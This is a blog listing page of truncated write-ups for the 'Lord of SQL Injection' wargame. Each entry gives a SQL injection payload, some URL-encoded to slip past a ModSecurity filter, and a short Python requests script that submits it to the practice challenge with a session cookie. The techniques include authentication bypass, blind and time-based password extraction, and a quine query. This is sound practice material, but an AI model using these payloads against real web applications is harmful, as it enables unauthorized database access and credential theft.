HACKINTOANETWORK

WEB APPLICATION BUG HUNTER, PENETRATION TESTER

Wargame/Lord of SQL Injection

Prob Payload id=' or id=char(97)||char(100)||char(109)||char(105)||char(110)--%20 Exploit import requests url = "https://los.rubiya.kr/chall/manticore_f88f07d899ad0fc8738fe3aaacff9974.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def solve(): query = "id=' or id=char(97)||char(100)||char(109)||char(105)||char(110)-- " res = requests.get(url=url+query, cookies=cookie) if "MANTICORE Cl..

2022. 10. 25.

Wargame/Lord of SQL Injection

Prob Payload id=admin%27%20--%20 Exploit import requests url = "https://los.rubiya.kr/chall/chupacabra_8568ab6205bea61d634a8cc67484a35c.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def solve(): query = "id=admin%27%20--%20" res = requests.get(url=url+query, cookies=cookie) if "CHUPACABRA Clear!" in res.text: print("CHUPACABRA Clear!") if __name__ == "__main__": solve()

2022. 10. 25.

Wargame/Lord of SQL Injection

Prob Payload Payload - URL Encode id=%27%3C%40%3D1%20union%2F**%2Fselect%20%27first%27%2C%27second%27%23 Exploit import requests url = "https://modsec.rubiya.kr/chall/cyclops_9d6a565d1cb6c38a06a6b0815344e29e.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def solve(): query = "id='

2022. 10. 23.

Wargame/Lord of SQL Injection

Prob Payload Payload - URL Encode pw=%27%3C%40%3D1%20or%20id%3D%27admin%27%20and%20length(pw)%3D8%23 pw=%27%3C%40%3D1%20or%20id%3D%27admin%27%20and%20ascii(substr(pw%2C1%2C1))%3D97%23 Exploit import requests import string url = "https://modsec.rubiya.kr/chall/godzilla_799f2ae774c76c0bfd8429b8d5692918.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def pw_length(): pw_len = 0 while True..

2022. 10. 23.

Wargame/Lord of SQL Injection

Prob Payload Payload - URL Encode id=%27%3C%40%3D1%20or%20id%3Dconcat(%27a%27%2C%27dmin%27)--%20 Exploit import requests url = "https://modsec.rubiya.kr/chall/death_0128e8a86066ca4f148444f0e99f4707.php?" cookie = {'PHPSESSID':'s93536osgfmtdaqp4b5lpnt7p9'} def solve(): query = "id=%27%3C%40%3D1%20or%20id%3Dconcat(%27a%27%2C%27dmin%27)--%20" res = requests.get(url=url+query,cookies=cookie) if "DEA..

2022. 10. 15.

Wargame/Lord of SQL Injection

Prob Payload Payload - URL Encode id=%27%3C%40%3D1%20or%201--%20 Exploit import requests url = "https://modsec.rubiya.kr/chall/cthulhu_c26ae41c4af4c2d7b21c19cbb9009604.php?" cookie = {'PHPSESSID':'pug9dnqndkn502s09mds1uiu9o'} def solve(): query = "id=%27%3C%40%3D1%20or%201--%20" res = requests.get(url=url+query,cookies=cookie) if "CTHULHU Clear!" in res.text: print("CTHULHU Clear!") if __name__ ..

2022. 10. 14.

Wargame/Lord of SQL Injection

Prob Payload no=0 union select concat(mid("as",1+(now()%2=sleep(1)),1),"dmin")#' union select concat(mid("sa",1+(now()%2=sleep(1)),1),"dmin")# Payload - URL Encode no=0%20union%20select%20concat(mid(%22as%22%2C1%2B(now()%252%3Dsleep(1))%2C1)%2C%22dmin%22)%23%27%20union%20select%20concat(mid(%22sa%22%2C1%2B(now()%252%3Dsleep(1))%2C1)%2C%22dmin%22)%23 Exploit import requests url = 'https://los.rub..

2022. 10. 13.

Wargame/Lord of SQL Injection

Prob Payload pw='union select substr(info,38,69) from information_schema.processlist%23 Exploit import requests url = 'https://los.rubiya.kr/chall/zombie_78238dee92f8ed0f508b0e9e00fc0e49.php?' cookie = {'PHPSESSID':'2cus8abp8eb3greqqsrpgoupla'} def solve(): query = "pw='union select substr(info,38,69) from information_schema.processlist%23" res = requests.get(url=url+query,cookies=cookie) if "ZO..

2022. 10. 13.

Wargame/Lord of SQL Injection

Prob Payload pw=a' union select replace(replace('a" union select replace(replace("$",char(34),char(39)),char(36),"$") as pw%23',char(34),char(39)),char(36),'a" union select replace(replace("$",char(34),char(39)),char(36),"$") as pw%23') as pw%23 Exploit import requests url = "https://los.rubiya.kr/chall/ouroboros_e3f483f087c922c84373b49950c212a9.php?" cookie = {'PHPSESSID':'2l2tjeutp0q371uvicd2a..

2022. 10. 9.